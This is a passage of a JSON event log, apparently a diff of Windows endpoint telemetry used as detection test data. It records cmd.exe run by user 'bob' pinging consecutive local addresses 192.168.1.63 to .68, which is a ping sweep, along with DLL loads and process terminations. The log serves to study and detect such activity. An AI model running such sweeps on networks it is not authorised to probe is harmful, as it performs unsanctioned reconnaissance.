"C:\\Windows\\System32\\ntdll.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "process", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572286990000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.63", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6236, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": 
"C:\\Windows\\System32\\PING.EXE", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287300000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "process", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572291830000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.64", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5388, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 
131883572291980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "process", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572296830000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.65", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4656, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572297020000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "process", - 
"pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572301840000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.66", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7784, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572302020000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - 
"unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "process", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572306840000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.67", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4164, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572307020000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": 
"{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "process", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572311840000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.68", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5260, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572312010000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - 
}, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572312140000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - 